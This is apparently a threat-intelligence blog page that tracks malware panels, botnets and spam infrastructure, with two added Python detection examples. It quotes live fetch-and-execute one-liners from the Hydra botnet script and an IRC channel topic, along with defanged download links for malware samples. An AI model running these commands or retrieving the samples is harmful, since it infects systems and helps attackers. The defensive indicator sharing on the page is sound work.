poweroftech.com(DiamondFox Hosted In Russian Federation Moscow Mediaserviceplus Ltd.)

Uncategorized

Resolved : [ poweroftech.com ] To [ 193.0.200.89 ]
Panel here : hxxp://poweroftech.com/poweroftech.com/soul/
Sample here : hxxp://www.gramer.pro/get/run.exe
Other samples : hxxp://www.gramer.pro/get/
Different folders : hxxp://poweroftech.com/
Loader.bat : hxxp://poweroftech.com/sin/ or direct link : hxxp://poweroftech.com/sin/loader.bat
Hosting Infos : http://whois.domaintools.com/193.0.200.89

Hydra Botnet (Hosted In France Paris Hexatom)


Around 100 Hydra bots inside.
Server : 149.91.89.253:6667
Channel : #perls
URLs : hxxp://208.67.1.142/ddos.pl hxxp://208.67.1.142/hack/ (you can get the rest of the files here)
Binary.sh :
cd /tmp && wget -q hxxp://208.67.1.142/hack/telmipsel && chmod +x telmipsel && ./telmipsel
cd /tmp && wget -q hxxp://208.67.1.142/hack/telmips && chmod +x telmips && ./telmips
cd /tmp && wget -q hxxp://208.67.1.142/hack/telsh4 && Read more...

Trojan.GenericKD.3018192 (Hosted In Germany Falkenstein Hetzner Online Gmbh)


Email spam via these SMTP servers :
“cdptpa-pub-iedge-vip.email.rr.com” “smtp.orange.fr” “smtp.sina.com” “smtp.googlemail.com” “smtp.tiscali.co.uk” “out.alice.it”
Servers used to spam :
“173.194.195.16:25” “78.47.198.134:80” “62.24.139.11:25” “107.14.166.70:25” “193.252.22.86:25” “82.57.200.132:25” “202.108.6.242:25”
Downloaded files :
“GET /libeay32.dll HTTP/1.0 Host: 78.47.198.134 Keep-Alive: 300 Connection: keep-alive Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6 User-Agent: Mozilla/4.0 (compatible; Synapse)”
“GET /ssleay32.dll HTTP/1.0 Host: 78.47.198.134 Keep-Alive: 300 Connection: keep-alive Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6 User-Agent: Read more...

Worm Porphiex


Domains used by the worm :
“tuhocphp.net” “milomaine.org” “milwaukeearmedforcesweek.org” “millplainlibrary.org” “mimemoria.org” “militarytrial.org” “milesbuckinghamlaw.org” “millcreek-construction.org” “milpitasvoter.org” “milkingshadows.org” “millionairemakers.org” “millgroup.org” “mimedrive.org” “millriverwatershed.org” “minaple.org” “millercountyga.org” “milwaukeelandmarks.org” “milyonbabies.org” “military-law.org” “mindfullife.org”
Servers used by the worm :
“220.181.87.80:5050” “112.78.4.160:80” “213.186.33.5:25” “82.165.73.126:25” “199.34.228.68:25” “81.169.145.84:25” “184.168.221.20:25” “82.165.100.254:25” “92.61.157.100:25” “184.168.221.53:25” “173.255.220.88:25” “82.165.100.228:25” “184.168.221.76:25” “198.11.204.78:25” “143.95.43.78:25” “104.25.88.29:25” “74.208.60.100:25” “66.39.35.237:25” “50.63.202.34:25” “50.63.202.18:25”
Downloaded files : Read more...
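Both this post and the Trojan.GenericKD one above describe the same behaviour on the wire: an infected workstation delivering mail itself, straight to a long list of remote port-25 servers, instead of handing it to the local relay. The block below is an added example (not code from this blog) of the simplest detection for that pattern over flow records: count distinct port-25 destinations per source and alert above a threshold, while excluding the hosts that are supposed to fan out. The destination addresses are the ones listed in the post; the 10.0.0.x sources, the relay 10.0.0.5 and the flow tuples themselves are constructed for the example.

```python
from collections import defaultdict

# Constructed flow records (src, dst, dport). The destination addresses
# are the servers quoted in the post above; the 10.0.0.x sources and the
# local relay 10.0.0.5 are assumptions made for this example.
SAMPLE_FLOWS = [
    ("10.0.0.23", "220.181.87.80", 5050),   # C2-style port, not SMTP
    ("10.0.0.23", "112.78.4.160", 80),      # HTTP download, not SMTP
    ("10.0.0.23", "213.186.33.5", 25),
    ("10.0.0.23", "82.165.73.126", 25),
    ("10.0.0.23", "199.34.228.68", 25),
    ("10.0.0.23", "81.169.145.84", 25),
    ("10.0.0.23", "184.168.221.20", 25),
    ("10.0.0.23", "82.165.100.254", 25),
    ("10.0.0.23", "92.61.157.100", 25),
    ("10.0.0.23", "184.168.221.53", 25),
    ("10.0.0.23", "184.168.221.53", 25),    # repeat connection: counted once
    ("10.0.0.7",  "10.0.0.5", 25),          # normal client using the relay
    ("10.0.0.5",  "173.255.220.88", 25),    # the relay fans out legitimately
    ("10.0.0.5",  "82.165.100.228", 25),
    ("10.0.0.5",  "184.168.221.76", 25),
    ("10.0.0.5",  "198.11.204.78", 25),
    ("10.0.0.5",  "143.95.43.78", 25),
    ("10.0.0.5",  "104.25.88.29", 25),
]

# Hosts allowed to speak SMTP to many peers (assumed local mail relay).
MAIL_RELAYS = frozenset({"10.0.0.5"})


def smtp_fanout(flows, threshold=5, relays=MAIL_RELAYS):
    """Return {src: sorted distinct port-25 peers} for every source that
    connected to at least `threshold` distinct SMTP servers and is not a
    known relay. A workstation with a high fan-out is a spam bot candidate."""
    peers = defaultdict(set)
    for src, dst, dport in flows:
        if dport == 25 and src not in relays:
            peers[src].add(dst)
    return {src: sorted(p) for src, p in peers.items() if len(p) >= threshold}


if __name__ == "__main__":
    for src, dsts in smtp_fanout(SAMPLE_FLOWS).items():
        print(f"{src}: {len(dsts)} distinct SMTP peers -> {dsts}")
```

The threshold is the tuning knob: on a network where workstations never talk to port 25 directly, a threshold of 1 (or a firewall rule) is the right answer; the allowlist matters only because a real relay looks exactly like a spam bot to this logic.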

comment.dyn.mk(Linux Irc Bots Hosted In Korea, Republic Of Seoul Sk Broadband Co Ltd)


Resolved : [ comment.dyn.mk ] To [ 1.234.46.241 ] (maybe a hacked machine).
$server = 'comment.dyn.mk' unless $server;
my $port = '6667';
[11:00] * Now talking in #kill (around 100 bots inside)
[11:00] * Topic is 'wget hxxp://cmt.ucoz.com/dyn.pdf;perl dyn.pdf;perl dyn.pdf;perl dyn.pdf;rm -rf dyn.pdf;history -c '
[11:00] * Set by anonplus on Thu Jan 07 17:06:34 U Read more...
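The Hydra Binary.sh lines above and the #kill channel topic here are the same thing in two forms: a one-line cradle that fetches a payload, runs it, and sometimes cleans up after itself. The block below is an added example (not code from this blog or from the bots) that splits such a line on its command separators, refangs the hxxp:// URLs, pulls out the hosts and file names, guesses the target architecture from the Hydra-style name suffix, and reports whether the cradle actually reaches an execute step. It serves both posts; the input lines are copied from the page as they appear (the third Hydra line is truncated there, and the parser treats it as an incomplete cradle). The architecture suffix table is an assumption for the example.

```python
import re
from urllib.parse import urlsplit

# Constructed inputs, copied from the two posts as they appear on the page
# (defanged "hxxp" scheme; the third Hydra line is cut off on the page).
HYDRA_BINARY_SH = [
    "cd /tmp && wget -q hxxp://208.67.1.142/hack/telmipsel && chmod +x telmipsel && ./telmipsel",
    "cd /tmp && wget -q hxxp://208.67.1.142/hack/telmips && chmod +x telmips && ./telmips",
    "cd /tmp && wget -q hxxp://208.67.1.142/hack/telsh4 &&",
]
KILL_TOPIC = ("wget hxxp://cmt.ucoz.com/dyn.pdf;perl dyn.pdf;perl dyn.pdf;"
              "perl dyn.pdf;rm -rf dyn.pdf;history -c ")

# Name suffixes commonly used for multi-arch IoT payloads (assumption for
# this example; longer suffixes first so "mipsel" is not read as "mips").
ARCH_SUFFIXES = ("mipsel", "mips", "sh4", "arm", "x86", "i686", "ppc")

SEPARATORS = re.compile(r"\s*(?:&&|\|\||;)\s*")
FETCHER = re.compile(r"^(wget|curl)\b(.*)$")
INTERPRETER = re.compile(r"^(?:perl|python|sh|bash)\s+(\S+)")
CLEANUP = re.compile(r"^(?:rm\s|history\s+-c)")


def refang(url):
    """Turn the defanged hxxp:// scheme back into http:// for matching."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url)


def guess_arch(filename):
    for suffix in ARCH_SUFFIXES:
        if filename.endswith(suffix):
            return suffix
    return None


def parse_cradle(line):
    """Break a one-line fetch-and-execute cradle into its IOCs."""
    urls, executed, cleanup = [], [], False
    for cmd in filter(None, (c.strip() for c in SEPARATORS.split(line))):
        m = FETCHER.match(cmd)
        if m:
            urls += [refang(t) for t in m.group(2).split()
                     if t.startswith(("http://", "https://", "hxxp://", "hxxps://"))]
        elif cmd.startswith("./"):                  # ./telmipsel
            executed.append(cmd[2:].split()[0])
        elif INTERPRETER.match(cmd):                # perl dyn.pdf
            executed.append(INTERPRETER.match(cmd).group(1))
        elif CLEANUP.match(cmd):                    # rm -rf ..., history -c
            cleanup = True
    names = [urlsplit(u).path.rsplit("/", 1)[-1] for u in urls]
    return {
        "urls": urls,
        "hosts": sorted({urlsplit(u).hostname for u in urls}),
        "filenames": names,
        "arch": [guess_arch(n) for n in names],
        "executed": executed,
        # a complete cradle fetches a file and then runs that same file
        "complete": any(n in executed for n in names),
        "cleanup": cleanup,
    }


def extract_iocs(lines):
    """Collect every distinct host and URL referenced by a set of cradles."""
    hosts, urls = set(), set()
    for line in lines:
        parsed = parse_cradle(line)
        hosts.update(parsed["hosts"])
        urls.update(parsed["urls"])
    return sorted(hosts), sorted(urls)


if __name__ == "__main__":
    for line in HYDRA_BINARY_SH + [KILL_TOPIC]:
        print(parse_cradle(line))
    print(extract_iocs(HYDRA_BINARY_SH + [KILL_TOPIC]))
```

The "complete" flag is what separates a real infection chain from a download that never ran, and the cleanup flag is worth alerting on by itself: `rm` of the just-executed file plus `history -c` is an anti-forensics step that no legitimate install script needs.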

inmrvogurin.ru(Pony Hosted In Macao Macau Alan Hqservers Web Studio)


This guy keeps changing domain names but he uses the same stuff.
Resolved : [ inmrvogurin.ru ] To [ 163.53.247.144 ]
URLs : hxxp://inmrvogurin.ru/SY/test/gate.php hxxp://inmrvogurin.ru/SY/test/admin.php
The TF letters in red are maybe a tribute to TrojanForge.
Sample here : hxxp://inmrvogurin.ru/SY/test/micro.exe
Hosting Infos : http://whois.domaintools.com/163.53.247.144

proexti.ufam.edu.br(Trojan.Win32.Generic Hosted In Brazil Manaus Associacao Rede Nacional De Ensino E Pesquisa)


This is the downloader : hxxp://www.xup.in/dl,79161341/010-RELATORIOFINAL_2601.doc.exe.7z/
Domain used to download the trojan : hellolink.biz 110.4.45.31
URL : hxxp://hellolink.biz/pinjam.my/counter/WinProc.zip (unzip the file, the trojan exe is inside)
The trojan is packed with Themida and gets a file from here : proexti.ufam.edu.br/xmlrpc/content/count/B/fix.php
Hosting Infos : http://whois.domaintools.com/200.129.163.16